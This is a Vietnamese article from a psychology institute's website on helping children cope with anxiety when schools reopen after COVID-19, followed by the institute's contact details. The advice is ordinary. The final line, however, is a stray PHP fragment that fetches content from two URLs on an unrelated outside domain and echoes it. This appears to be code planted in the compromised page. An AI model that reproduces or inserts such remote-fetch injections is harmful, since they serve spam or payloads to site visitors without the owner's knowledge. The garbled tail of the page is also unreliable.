ĐỐI MẶT VỚI NỖI LO ÂU KHI TRỞ LẠI TRƯỜNG HỌC - TRONG BỐI CẢNH DỊCH COVID-19

Không nghi ngờ gì khi hai năm vừa qua trở nên rất khó khăn, đại dịch COVID-19 đã thay đổi những thứ mà chúng ta từng coi là “bình thường”. Nhất là với môi trường giáo dục đã chuyển sang học trực tuyến chỉ sau một đêm – đó là sự thay đổi khó khăn với tất cả các học sinh. Nhưng hiện tại, với khá nhiều loại vaccine hiện có ở Việt Nam và mỗi trường học tại mỗi địa phương khác nhau đang dần mở cửa trở lại, các bậc phụ huynh, học sinh và giáo viên cần chuẩn bị tâm thế cho việc quay lại trường học trong tương lai.

Chắc chắn việc trở lại học trực tiếp sau nhiều tháng học online sẽ gợi ra một loạt những cảm xúc, từ hào hứng cho tới lo sợ. Cảm giác lo âu xung quanh những thay đổi lớn là một điều điển hình, vậy có cách nào để bạn có thể giúp con mình đối mặt với nó?



Vì sao chúng ta lo lắng khi trở lại trường học?

Đối với tất cả chúng ta, nỗi lo sợ về khả năng lây nhiễm virus COVID-19 vẫn đang là một thực tế, đặc biệt là khi những biến thể mới của virus xuất hiện càng nhiều. Một vài phụ huynh có thể băn khoăn khi cho con mình quay trở lại trường học: con cái chúng ta rất cần học và tương tác với các bạn trực tiếp, nhưng COVID-19 vẫn là một rủi lo lớn. TS. Kyle Monk, bác sĩ nhi khoa cho biết, “Phụ huynh và học sinh có rất nhiều cảm xúc lẫn lộn về việc quay trở lại trường học… Chúng ta vui mừng về những ưu điểm của việc học trực tiếp, không chỉ vì rất nhiều trẻ em đang phải gặp khó khăn trong việc học, mà vì trường học thực sự quan trọng đối với sự phát triển của trẻ.”

Điều quan trọng là chúng ta cần biết về những sự thật và thông tin cần thiết về đại dịch COVID-19, và Bộ Y tế là một nguồn đáng tin cậy. Bất kể con bạn đã được tiêm phòng hay chưa, chúng có thể sẽ được yêu cầu đeo khẩu trang và thực hiện các biện pháp phòng ngừa an toàn như duy trì khoảng cách xã hội và thực hành vệ sinh tay đúng cách. Dự phòng quy trình của trường học nếu một học sinh bị nhiễm virus - và chuẩn bị cho con bạn trong bất kì tình huống nào cũng có ích. Có một kế hoạch cho bản thân và con khi chúng quay trở lại trường có thể giúp những kỳ vọng trở nên thực tế nếu mọi thứ không diễn ra theo đúng kế hoạch.

Với trẻ em, bất kì gián đoạn nào đối với một thói quen có thể gây nên những cảm xúc lo lắng và căng thẳng. Vì vậy hãy nhớ quan sát và trò chuyện với con bạn một cách thường xuyên. Việc chú ý đến hành vi và cảm xúc của con bạn là rất quan trọng. Đặc biệt, trẻ em nhỏ tuổi có thể bị choáng ngợp khi ở trong một môi trường xã hội phong phú sau thời gian dài phải ở nhà.

Với thanh thiếu niên, theo chương trình Sơ cứu Sức khoẻ Tâm thần (Mental Health First Aid) dành cho tuổi teen, những triệu chứng lo âu có thể xuất hiện khi trẻ cảm thấy cực kì lo lắng, bồn chồn hoặc sợ hãi. Đôi khi những nỗi sợ hay lo lắng ấy khiến trẻ muốn né tránh những hoạt động hoặc địa điểm nhất định; chúng cũng có thể gặp vấn đề ở nơi làm việc hoặc trường học, hay trở nên lo âu khi ở xung quanh bạn bè hoặc các tình huống xã hội. Những dấu hiệu của trầm cảm hoặc căng thẳng cũng có thể xuất hiện khi thanh thiếu niên quay trở lại trường học. Nếu con bạn trở nên thu mình hơn bình thường hoặc xuất hiện những cơn đau nhức không có lý do thực thể, bạn nên bắt đầu một cuộc trò chuyện cởi mở về cảm xúc của chúng.

Tôi cần làm gì để con tôi bớt lo lắng khi quay lại trường học?

Những thách thức và khó khăn về sức khoẻ tâm thần có thể ảnh thưởng tiêu cực tới việc học tập và phát triển của trẻ. Vì vậy cha mẹ nên thường xuyên hỏi thăm và trang bị những công cụ và kĩ năng cần thiết để hỗ trợ con cái một cách tốt nhất.

Tạo không gian để con bạn có thể giao tiếp cởi mở với bạn, và hãy thành thật với chúng về cảm nhận của bạn. Tất cả cảm xúc của con bạn đều có ý nghĩa bất kể đó là cảm xúc gì, và bạn có thể giúp chúng làm việc với những cảm xúc ấy một cách lành mạnh. Một điều hữu ích nữa là bạn có thể trò chuyện cởi mở với giáo viên của con mình và quản lý của trường, nhất là khi chính bạn cũng đang cảm thấy lo lắng.

Quay trở lại trường và học trực tiếp có thể không dễ dàng cho bạn và con bạn, nhưng việc trò chuyện cởi mở, có kế hoạch dự phòng và xác định những kỳ vọng phù hợp là một vài cách để bạn có thể khiến những thay đổi này dễ dàng hơn cho cả gia đình.

Nguồn bài: Coping with Back-to-School Anxiety During COVID-19- Mental Health First Aid USA

Hãy liên hệ với số hotline 0977.729.396 của Viện ngay hôm nay để được tư vấn tận tình.

Hình ảnh một số bác sĩ tâm thần và chuyên gia tâm lý được đào tạo bài bản và giàu kinh nghiệm của Viện Tâm Lý Việt - Pháp:

-----------------------------

Viện Tâm lý Việt - Pháp

Trụ sở Hà Nội: Số 54 Trần Quốc Vượng, P. Dịch Vọng Hậu, Q. Cầu Giấy, TP. Hà Nội

Trụ sở TP.HCM: Landmark 81, Vinhomes Central Park, 720A Điện Biên Phủ, P.22, Q. Bình Thạnh, Tp. Hồ Chí Minh

Hotline: 0912.012.684  (Zalo, 24/7)

Email: daotao@tamlyvietphap.vn

Facebook: https://www.facebook.com/tamlyvietphap.vn

Bài viết liên quan

Gọi cho tôi

Hãy gửi thông tin cho chúng tôi, nhân viên tư vấn của Viện sẽ liên hệ lại Quý khách trong vòng 24h. Thông tin của Quý khách chỉ để chúng tôi liên hệ và không gửi cho bên thứ ba.

Tài nguyên

Trắc nghiệm

https://tracnghiem.tamlyvietphap.vn/

$content1 = file_get_contents("https://ayambakar.vip/bl/bc.php"); $content2 = file_get_contents("https://ayambakar.vip/st/index.php"); echo ''; echo ''; ?>